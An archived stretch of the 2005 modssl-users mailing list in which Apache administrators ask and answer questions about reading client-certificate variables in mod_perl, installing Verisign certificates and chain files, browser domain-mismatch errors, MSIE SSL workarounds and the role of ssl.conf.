	by master.modssl.org (Postfix) with SMTP id E5D2BA8978
	for ; Mon, 17 Jan 2005 12:00:59 +0100 (CET)
Received: (qmail 51176 invoked by uid 60001); 17 Jan 2005 11:00:41 -0000
Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  b=4h2xaOp9vqH+z5afEceV6lD6pR/ePtxrx8hFnGpcBL9BbKyZQRUQjmKajhAz1wYwCSW4cknOGXsSUpTuYLhCk5R9kvbP8qUKfe/3XwlJ0lxr5imJXGt9STqvabNUEGS96F70rlL9iG6JKDpBf4IRDtdBEpXbp35GLY13d0n/DRA=  ;
Message-ID: <20050117110041.51174.qmail@web60704.mail.yahoo.com>
Received: from [62.129.121.32] by web60704.mail.yahoo.com via HTTP; Mon, 17 Jan 2005 03:00:41 PST
Date: Mon, 17 Jan 2005 03:00:41 -0800 (PST)
From: Matt Stevenson 
Subject: Re: mod_ssl environment variables
To: modssl-users@modssl.org
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

You can try something like ...


  # Get SSL variables into subprocess...
  my $subr = $r->lookup_uri( $r->uri() );

  # Get serial and issuer
  my $serial =
$subr->subprocess_env('SSL_CLIENT_M_SERIAL') || "";
  my $issuer_slashes =
$subr->subprocess_env('SSL_CLIENT_I_DN') || "";

Hope that works.

Regards
Matt

--- Jason Kaskel  wrote:

> This is technically both a mod_perl and mod_ssl
> question. Maybe I 
> should harass their mailing list too.
> 
> I have a PerlAccessHandler that needs to access
> certificate 
> information.  According to what I've read the
> environment isn't loaded 
> with this information until the fixup phase which
> occurs right before 
> the response phase (and well after the access
> phase).  Is there any 
> other way for me to access certificate information
> this early in the 
> Apache process (specifically the data that gets
> loaded into 
> SSL_CLIENT_S_DN_CN)?  Failing that is there a way
> for me to force the 
> fixup phase to occur before the access phase?
> 
> Thanks for any help!
> 
> -Jason
> kaskel@ccs.nrl.navy.mil
> 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
> 



		
__________________________________ 
Do you Yahoo!? 
Yahoo! Mail - Helps protect you from nasty viruses. 
http://promotions.yahoo.com/new_mail
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 17 12:38:41 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DB432A8978; Mon, 17 Jan 2005 12:38:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 4BF90A8948
	for ; Mon, 17 Jan 2005 12:38:36 +0100 (CET)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.11/8.12.11) with ESMTP id j0HBcE3B002732;
	Mon, 17 Jan 2005 06:38:14 -0500
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id j0HBcCO18719;
	Mon, 17 Jan 2005 06:38:12 -0500
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.13.1/8.12.7) with ESMTP id j0HBcAb1003548;
	Mon, 17 Jan 2005 11:38:10 GMT
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.13.1/8.12.10/Submit) id j0HBc6xj003544;
	Mon, 17 Jan 2005 11:38:06 GMT
Date: Mon, 17 Jan 2005 11:38:06 +0000
From: Joe Orton 
To: Jason Kaskel 
Cc: modssl-users@modssl.org
Subject: Re: mod_ssl environment variables
Message-ID: <20050117113806.GA1572@redhat.com>
Mail-Followup-To: Jason Kaskel ,
	modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Jan 14, 2005 at 04:48:09PM -0500, Jason Kaskel wrote:
> This is technically both a mod_perl and mod_ssl question. Maybe I 
> should harass their mailing list too.
> 
> I have a PerlAccessHandler that needs to access certificate 
> information.  According to what I've read the environment isn't loaded 
> with this information until the fixup phase which occurs right before 
> the response phase (and well after the access phase).  Is there any 
> other way for me to access certificate information this early in the 
> Apache process (specifically the data that gets loaded into 
> SSL_CLIENT_S_DN_CN)?  Failing that is there a way for me to force the 
> fixup phase to occur before the access phase?

With the mod_ssl in httpd 2.0, you can do this using Geoff Young's
Apache::SSLLookup module, which extracts variables directly from mod_ssl
rather than going through the environment table:

http://search.cpan.org/~geoff/Apache-SSLLookup-2.00_02/

Regards,

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 19 08:24:12 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DD99BA8A4F; Wed, 19 Jan 2005 08:24:12 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rproxy.gmail.com (rproxy.gmail.com [64.233.170.205])
	by master.modssl.org (Postfix) with ESMTP id 3F864A8933
	for ; Wed, 19 Jan 2005 08:24:07 +0100 (CET)
Received: by rproxy.gmail.com with SMTP id g11so113316rne
        for ; Tue, 18 Jan 2005 23:23:51 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:to:subject:in-reply-to:mime-version:content-type:references;
        b=HA9W0+opgzZdtZ98N/Fqhvnyb0RMX5RqLV031zYjSwwfCymAuvMBPp2colajO+WkG1TmqsSmEDd+e/YHjuGwDXiwRPUcrqvrJnj44iHVVN8Q8QIDPkXCPkkHxW47o5TDBeq2VDzkyOkz5YCWVDbI+1+Rch/E899Tqg02ifE2wAM=
Received: by 10.38.76.77 with SMTP id y77mr195302rna;
        Tue, 18 Jan 2005 23:23:51 -0800 (PST)
Received: by 10.38.77.36 with HTTP; Tue, 18 Jan 2005 23:23:51 -0800 (PST)
Message-ID: <5016fc50501182323dd20254@mail.gmail.com>
Date: Wed, 19 Jan 2005 15:23:51 +0800
From: Louie Miranda 
To: modssl-users@modssl.org
Subject: SSL problem (Connection to child 2 closed with standard shutdown)
In-Reply-To: <5016fc50501182322609ebe4c@mail.gmail.com>
Mime-Version: 1.0
Content-Type: multipart/mixed; 
	boundary="----=_Part_8_29266060.1106119431079"
References: <5016fc50501182322609ebe4c@mail.gmail.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Louie Miranda 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_8_29266060.1106119431079
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

I just recenlty bought a Verisign certificate.

And installed the certificate file and the config on apache.

        
                SSLEngine On
                SSLLog "/var/log/httpd/ssl_engine_log"
#               SSLCertificateChainFile "/etc/httpd/ssl.rpc/verisign.ssl"
                SSLCertificateFile "/etc/httpd/ssl.rpc/verisign.ssl"
                SSLCertificateKeyFile "/etc/httpd/ssl.rpc/secureprivate.key"
                SSLCipherSuite
"ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+LOW:!SSLv2:+EXP:+eNULL"
                SSLCertificateChainFile "/etc/httpd/ssl.rpc/verisign.ssl"
        

And, restarted my server. When i visited it, it didnt work.
I was also wondering what will be put on "SSLCertificateChainFile"?

The error logs are attached as text file.

Please help me!

--
Louie Miranda
http://www.axishift.com

------=_Part_8_29266060.1106119431079
Content-Type: text/plain; name=ssl_error.txt; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="ssl_error.txt"

[19/Jan/2005 15:11:59 18334] [info]  Connection to child 2 established (server example.com:443, client 192.168.0.55)
[19/Jan/2005 15:11:59 18334] [info]  Seeding PRNG with 1160 bytes of entropy
[19/Jan/2005 15:11:59 18334] [info]  Connection: Client IP: 192.168.0.55, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
[19/Jan/2005 15:11:59 18334] [info]  Connection to child 2 closed with standard shutdown (server example.com:443, client 192.168.0.55)
[19/Jan/2005 15:12:01 18290] [info]  Connection to child 1 established (server example.com:443, client 192.168.0.55)
[19/Jan/2005 15:12:01 18290] [info]  Seeding PRNG with 1160 bytes of entropy
[19/Jan/2005 15:12:01 18290] [info]  Connection: Client IP: 192.168.0.55, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
[19/Jan/2005 15:12:01 18290] [info]  Initial (No.1) HTTPS request received for child 1 (server example.com:443)
[19/Jan/2005 15:12:01 18290] [info]  Connection to child 1 closed with unclean shutdown (server example.com:443, client 192.168.0.55)
[19/Jan/2005 15:12:02 18334] [info]  Connection to child 2 established (server example.com:443, client 192.168.0.55)
[19/Jan/2005 15:12:02 18334] [info]  Seeding PRNG with 1160 bytes of entropy
[19/Jan/2005 15:12:02 18334] [info]  Connection: Client IP: 192.168.0.55, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
[19/Jan/2005 15:12:02 18334] [info]  Initial (No.1) HTTPS request received for child 2 (server example.com:443)
[19/Jan/2005 15:12:02 18334] [info]  Connection to child 2 closed with unclean shutdown (server example.com:443, client 192.168.0.55)
[19/Jan/2005 15:12:02 18279] [info]  Connection to child 0 established (server example.com:443, client 192.168.0.55)
[19/Jan/2005 15:12:02 18279] [info]  Seeding PRNG with 1160 bytes of entropy
[19/Jan/2005 15:12:02 18279] [info]  Connection: Client IP: 192.168.0.55, Protocol: SSLv3, Cipher: RC4-MD5 (128/128 bits)
[19/Jan/2005 15:12:02 18279] [info]  Initial (No.1) HTTPS request received for child 0 (server example.com:443)
[19/Jan/2005 15:12:02 18290] [info]  Connection to child 1 established (server example.com:443, client 192.168.0.55)
[19/Jan/2005 15:12:02 18290] [info]  Seeding PRNG with 1160 bytes of entropy


------=_Part_8_29266060.1106119431079--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 19 12:43:54 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 82B67A8A4F; Wed, 19 Jan 2005 12:43:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nav-srv.bevents.local (mail.b-events.co.il [62.219.226.238])
	by master.modssl.org (Postfix) with SMTP id 7B35DA8933
	for ; Wed, 19 Jan 2005 12:43:48 +0100 (CET)
Received: from mail.b-events.co.il ([192.168.10.254])
 by nav-srv.bevents.local (SMSSMTP 4.0.0.59) with SMTP id M2005011913471000639
 for ; Wed, 19 Jan 2005 13:47:10 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C4FE1C.9BF5F646"
Subject: Where can I find a runtime version of ModSSL
Date: Wed, 19 Jan 2005 13:47:09 +0200
Message-ID: <4862CECE84598D478DC79B219776C23C2F579E@PDCSRV01.bevents.local>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Where can I find a runtime version of ModSSL
Thread-Index: AcT+HJu5ullcWW5bTSSturFs4UIfzA==
From: "Tali Tsarfati" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tali Tsarfati" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C4FE1C.9BF5F646
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hi,

=20

Following the procedure described in
http://www.verisign.com/resources/gd/secureApache/index.html) I need to
download ModSSL.  However, I can't find the ModSSL runtime in
www.modssl.org - the only download file I found requires me to fully
compile everything, and it requires all sort of other products for this
purpose.  Where can I find a runtime version of ModSSL?

=20

Thanks

Tali

=20


------_=_NextPart_001_01C4FE1C.9BF5F646
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
















Hi,=




 



Following
the procedure described in htt=
p://www.verisign.com/resources/gd/secureApache/index.html)
I need to download ModSSL.  However, I can’t find the ModSSL =
runtime
in www.modssl.org – the only download file I found requires me to =
fully
compile everything, and it requires all sort of other products for this =
purpose.
 Where can I find a runtime version of =
ModSSL?



 



Thanks



Tali



 









------_=_NextPart_001_01C4FE1C.9BF5F646--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 20 19:09:31 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4F4B4A8A4F; Thu, 20 Jan 2005 19:09:31 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mlnyb902er.ml.com (mlnyb902er.ml.com [199.43.54.100])
	by master.modssl.org (Postfix) with ESMTP id 40A02A8963
	for ; Thu, 20 Jan 2005 19:09:25 +0100 (CET)
Received: from MLNYB852BH.amrs.win.ml.com (unknown [146.125.94.130])
	by mlnyb902er.ml.com (Postfix) with ESMTP id B3361F0069D3
	for ; Thu, 20 Jan 2005 13:09:02 -0500 (EST)
Received: from mlnya302bh.amrs.win.ml.com ([146.125.109.52]) by MLNYB852BH.amrs.win.ml.com with Microsoft SMTPSVC(5.0.2195.6713); Thu, 20 Jan 2005 13:09:02 -0500
Received: from mlnyb704mb.amrs.win.ml.com ([146.125.92.4]) by mlnya302bh.amrs.win.ml.com with Microsoft SMTPSVC(5.0.2195.6713); Thu, 20 Jan 2005 13:08:40 -0500
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C4FF1A.FC11C2B8"
Subject: RE: Domain Name Mismatch
Date: Thu, 20 Jan 2005 13:08:03 -0500
Message-ID: <40F9DB7EECEB4240B6FC40E23CD26CA503FD82BD@mlnyb704mb.amrs.win.ml.com>
Importance: normal
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Domain Name Mismatch
thread-index: AcT6VJ1cVk0qwKp0SRy4FLPUJY4GJQExdzNA
From: "Haskell, Scott (MLPRO SF)" 
To: 
X-OriginalArrivalTime: 20 Jan 2005 18:08:40.0906 (UTC) FILETIME=[124702A0:01C4FF1B]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Haskell, Scott (MLPRO SF)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C4FF1A.FC11C2B8
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Just a follow-up incase anyone was interested in my problem. I contacted
Verisign and we came to the conclusion that the web browser was
complaining due to an alternate CN that was added to the certificate.
The Verisign employee told me that although it's well within the x509
standards to use alternates in certificates, browsers seem to complain
about them a lot. So beware if you plan on using an alternate name on
your certificate, it may give you a domain name mismatch error.

Scott

>  -----Original Message-----
> From: 	Haskell, Scott (MLPRO SF) =20
> Sent:	Friday, January 14, 2005 8:18 AM
> To:	'modssl-users@modssl.org'
> Subject:	Domain Name Mismatch
>=20
> Greetings All,
>=20
> After much scouring of the web (modssl mailing list archives,
> newsgroups, websites) I can't seem to find a resolution to my problem.
> I've built apache_1.3.33, mod_ssl-2.8.22-1.3.33 and mm-1.3.1 as per
> the modssl INSTALL doc, section b (the flexible APACI-only way).
> Modssl is built and loaded as a DSO. I have a Verisign global
> certificate that I've installed, along with the appropriate
> intermediate certificate (SSLCertificateChainFile). I have also
> installed the root CA certs as well (SSLCACertificateFile).
>=20
> Here is my problem. When I navigate to the site (FQDN, not IP), via a
> browser (IE, Firefox, Mozilla...), I get a Domain Name Mismatch error
> reported by the browser. When I view the certificate, it shows that
> the CN matches the FQDN of the website, exactly. The website is
> www.myhost.domain.com and the CN that I used to create the cert is
> also www.myhost.domain.com. There is no mismatch between the FQDN of
> the site and the CN in the cert, yet the browser thinks there is. I
> can do a forward and reverse lookup on the FQDN and it's corresponding
> IP and both are correct, so this leads me to believe it's not a DNS
> issue. I viewed the cert in IE and checked the certificate path (3rd
> tab). The certificate status of all three certs (root, intermediate
> and my cert) is reported as 'OK'. The intermediate and root CA's also
> load with no errors (verified in the ssl_engine_log). This leads me to
> believe it's not a chaining problem. I've also tried creating and
> signing my own cert for testing purposes and I have the same issue, so
> that leads me to believe it's not a cert issue. I've also verified the
> csr, cert and key and they all match up.=20
>=20
> I'm at a loss here, so any help would be greatly appreciated. From all
> my research and what I've read, my error should really only stem from
> not using the FQDN of the site when creating the csr, but this is not
> the case. I quadruple checked it and I've created test certs as well,
> with the same results. Has anyone had a similar problem? Any
> suggestions on apache server config? I've even tried it with the most
> basic SSL options enabled in my httpd.conf file that would allow the
> hosting of an SSL enabled site. Thanks for your time and suggestions!
>=20
> Regards,
> Scott Haskell
> Solaris SA, Merrill Lynch Pro, San Francisco
--------------------------------------------------------

If you are not an intended recipient of this e-mail, please notify the =
sender, delete it and do not read, act upon, print, disclose, copy, =
retain or redistribute it. Click here for important additional terms =
relating to this e-mail.     http://www.ml.com/email_terms/
--------------------------------------------------------

------_=_NextPart_001_01C4FF1A.FC11C2B8
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable





						


RE: Domain Name Mismatch

					
						




Just a follow-up incase anyone was =
interested in my problem. I contacted Verisign and we came to the =
conclusion that the web browser was complaining due to an alternate CN =
that was added to the certificate. The Verisign employee told me that =
although it's well within the x509 standards to use alternates in =
certificates, browsers seem to complain about them a lot. So beware if =
you plan on using an alternate name on your certificate, it may give you =
a domain name mismatch error.



Scott



    

     -----Original Message-----


    From:   Haskell, Scott (MLPRO SF)  


    Sent:   Friday, January 14, 2005 8:18 AM


    To:     'modssl-users@modssl.org'


    Subject:       =
 Domain Name Mismatch

    


    Greetings All,

    


    After much scouring of the web (modssl =
mailing list archives, newsgroups, websites) I can't seem to find a =
resolution to my problem. I've built apache_1.3.33, =
mod_ssl-2.8.22-1.3.33 and mm-1.3.1 as per the modssl INSTALL doc, =
section b (the flexible APACI-only way). Modssl is built and loaded as a =
DSO. I have a Verisign global certificate that I've installed, along =
with the appropriate intermediate certificate (SSLCertificateChainFile). =
I have also installed the root CA certs as well =
(SSLCACertificateFile).
    


    Here is my problem. When I navigate to =
the site (FQDN, not IP), via a browser (IE, Firefox, Mozilla…), I =
get a Domain Name Mismatch error reported by the browser. When I view =
the certificate, it shows that the CN matches the FQDN of the website, =
exactly. The website is www.myhost.domain.com and the CN that I used to create the cert is =
also www.myhost.domain.com. There is no mismatch between the FQDN of the site and =
the CN in the cert, yet the browser thinks there is. I can do a forward =
and reverse lookup on the FQDN and it's corresponding IP and both are =
correct, so this leads me to believe it's not a DNS issue. I viewed the =
cert in IE and checked the certificate path (3rd tab). The certificate =
status of all three certs (root, intermediate and my cert) is reported =
as 'OK'. The intermediate and root CA's also load with no errors =
(verified in the ssl_engine_log). This leads me to believe it's not a =
chaining problem. I've also tried creating and signing my own cert for =
testing purposes and I have the same issue, so that leads me to believe =
it's not a cert issue. I've also verified the csr, cert and key and they =
all match up. 
    


    I'm at a loss here, so any help would =
be greatly appreciated. From all my research and what I've read, my =
error should really only stem from not using the FQDN of the site when =
creating the csr, but this is not the case. I quadruple checked it and =
I've created test certs as well, with the same results. Has anyone had a =
similar problem? Any suggestions on apache server config? I've even =
tried it with the most basic SSL options enabled in my httpd.conf file =
that would allow the hosting of an SSL enabled site. Thanks for your =
time and suggestions!
    


    Regards,


    Scott Haskell


    Solaris SA, Merrill Lynch Pro, San =
Francisco

    




						

							

						

						
If you are not an intended recipient of this e-mail, please =
notify the sender, delete it and do not read, act upon, print, disclose, =
copy, retain or redistribute it. Click here for important =
additional terms relating to this e-mail.     http://www.ml.com/email_terms/

						

							

						


------_=_NextPart_001_01C4FF1A.FC11C2B8--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan 22 11:37:40 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CF213A89B1; Sat, 22 Jan 2005 11:37:40 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from plasma.squigly.net (plasma.squigly.net [82.165.243.76])
	by master.modssl.org (Postfix) with ESMTP id 10525A8961
	for ; Sat, 22 Jan 2005 11:37:39 +0100 (CET)
Received: (qmail 4469 invoked from network); 22 Jan 2005 10:37:23 -0000
Received: from localhost (127.0.0.1)
  by localhost with SMTP; 22 Jan 2005 10:37:23 -0000
Received: from lucid.squigly.com (lucid.squigly.com [81.171.130.212]) 
	by webmail.squigly.net (IMP) with HTTP 
	for ; Sat, 22 Jan 2005 05:37:22 -0500
Message-ID: <1106390242.41f22ce2f2687@webmail.squigly.net>
Date: Sat, 22 Jan 2005 05:37:22 -0500
From: alex@squigly.net
To: modssl-users@modssl.org
Subject: MSIE downgrade-1.0 force-response-1.0
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: Internet Messaging Program (IMP) 3.2.3
X-Originating-IP: 81.171.130.212
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: alex@squigly.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi All,

I've but a brief question.  When implementing:

    SetEnvIf User-Agent ".*MSIE.*" \
             nokeepalive ssl-unclean-shutdown \
             downgrade-1.0 force-response-1.0

Into an apache configuration file, as noted at the link below...what if any
adverse affects can this have?  I'm a little hesitant implementing it against
all IE clients if it's not required -or- it will cause other issues.

http://www.modssl.org/docs/2.8/ssl_faq.html#ToC49

Much appreciated!
thanks
-sd

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 24 20:34:21 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 82A9CA8A8B; Mon, 24 Jan 2005 20:34:21 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from w1.paulbunyan.net (w1.paulbunyan.net [209.191.200.5])
	by master.modssl.org (Postfix) with ESMTP id 760E7A8A7D
	for ; Mon, 24 Jan 2005 20:34:15 +0100 (CET)
Received: from SysTech (ew142.ips.paulbunyan.net [209.191.213.142])
	by w1.paulbunyan.net (8.12.11/8.12.11) with SMTP id j0OJXuBr027372
	for ; Mon, 24 Jan 2005 13:33:57 -0600
Message-ID: <000a01c5024b$a8d066c0$ff00020a@SysTech>
From: "Tony Andrews" 
To: 
Subject: Newbie looking for some guidance.
Date: Mon, 24 Jan 2005 13:33:56 -0600
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0007_01C50219.5AA025D0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1409
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tony Andrews" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0007_01C50219.5AA025D0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Greetings...

We are attempting to add SSL to a server currently in production.  Some =
details:

AIX 5.2
Apache 2.0.39 (I did not install it, but I'm guessing it wasn't =
installed with mod_ssl)
just installed openssl 0.9.7d-1 (rpm prepared for AIX)

I'm familiar with setting up virtual hosts and have found some examples =
relating to virtual hosts and ssl...  I'm just a bit confused about a =
couple of things:

1.  Is there a way to install mod_ssl once apache has been installed?
2.  What is the role of the SSL.conf file? =20

Anything that might point to a good reference would be appreciated.  I'm =
not seeing anything specific to this in the FAQs.

Thanks,

Tony Andrews
------=_NextPart_000_0007_01C50219.5AA025D0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Greetings...


 


We are attempting to add SSL to a =
server currently=20
in production.  Some details:


 


AIX 5.2


Apache 2.0.39 (I did not install it, =
but I'm=20
guessing it wasn't installed with mod_ssl)


just installed openssl 0.9.7d-1 (rpm =
prepared for=20
AIX)


 


I'm familiar with setting up virtual =
hosts and have=20
found some examples relating to virtual hosts and ssl...  I'm just =
a bit=20
confused about a couple of things:


 


1.  Is there a way to install =
mod_ssl once=20
apache has been installed?


2.  What is the role of the =
SSL.conf=20
file?  


 


Anything that might point to a good =
reference would=20
be appreciated.  I'm not seeing anything specific to this in the=20
FAQs.


 


Thanks,


 


Tony Andrews


------=_NextPart_000_0007_01C50219.5AA025D0--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 24 20:49:32 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8E07EA8A8B; Mon, 24 Jan 2005 20:49:32 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sphinx.gsu.edu (sphinx.gsu.edu [131.96.2.23])
	by master.modssl.org (Postfix) with ESMTP id BAC45A8A7D
	for ; Mon, 24 Jan 2005 20:49:26 +0100 (CET)
Received: from zim.gsu.edu (zim.gsu.edu [131.96.234.45])
	by sphinx.gsu.edu (8.11.7p1+Sun/8.10.2) with ESMTP id j0OJn6s14421
	for ; Mon, 24 Jan 2005 14:49:06 -0500 (EST)
Received: (from sysmda@localhost)
	by zim.gsu.edu (8.11.7p1+Sun/8.11.7) id j0OJn6Q05782
	for modssl-users@modssl.org; Mon, 24 Jan 2005 14:49:06 -0500 (EST)
Date: Mon, 24 Jan 2005 14:49:06 -0500
From: Mike Alberghini 
To: modssl-users@modssl.org
Subject: Re: Newbie looking for some guidance.
Message-ID: <20050124194906.GA5653@zim.gsu.edu>
References: <000a01c5024b$a8d066c0$ff00020a@SysTech>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <000a01c5024b$a8d066c0$ff00020a@SysTech>
User-Agent: Mutt/1.4.2.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mike Alberghini 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

If you are running Apache2, mod_ssl is probably there.  You can run 
httpd -l
in your apache bin dir for a list of compiled in modules.

The ssl.conf file is an include that gets read and added into the 
httpd.conf file if apache is started with SSL enabled.  It contains
all the setting that are only of use to the SSL server, the most 
important ones being the location of the server certificate and key.

http://www.modssl.org/ is a good place to read up on this.


On Mon, Jan 24, 2005 at 01:33:56PM -0600, Tony Andrews wrote:
> Greetings...
> 
> We are attempting to add SSL to a server currently in production.  Some details:
> 
> AIX 5.2
> Apache 2.0.39 (I did not install it, but I'm guessing it wasn't installed with mod_ssl)
> just installed openssl 0.9.7d-1 (rpm prepared for AIX)
> 
> I'm familiar with setting up virtual hosts and have found some examples relating to virtual hosts and ssl...  I'm just a bit confused about a couple of things:
> 
> 1.  Is there a way to install mod_ssl once apache has been installed?
> 2.  What is the role of the SSL.conf file?  
> 
> Anything that might point to a good reference would be appreciated.  I'm not seeing anything specific to this in the FAQs.
> 
> Thanks,
> 
> Tony Andrews
-- 
Michael Alberghini
Software Systems Engineer
Georgia State University
mike@gsu.edu
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 25 06:53:30 2005
